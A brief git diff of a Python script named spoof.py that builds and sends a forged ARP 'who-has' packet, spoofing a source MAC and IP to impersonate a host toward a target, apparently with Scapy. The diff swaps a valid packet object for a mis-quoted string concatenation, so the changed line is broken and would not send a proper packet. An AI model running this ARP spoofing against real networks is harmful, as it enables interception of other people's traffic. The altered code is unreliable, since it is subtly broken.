diff --git a/spoof.py b/spoof.py index 375888d..2173f45 100644 --- a/spoof.py +++ b/spoof.py @@ -27,5 +27,5 @@ impersonation = # IMPERSONATION MAC # CRAFT & SEND PACKET -packet = Ether()/ARP(op="who-has", hwsrc=my_mac, psrc=impersonation, pdst=target) +packet = 'Ether(dst="ff:ff:ff:ff:ff:ff")/ARP(op="who-has", hwsrc='+my_mac+', psrc='+impersonation+', pdst='+target+')' sendp(packet)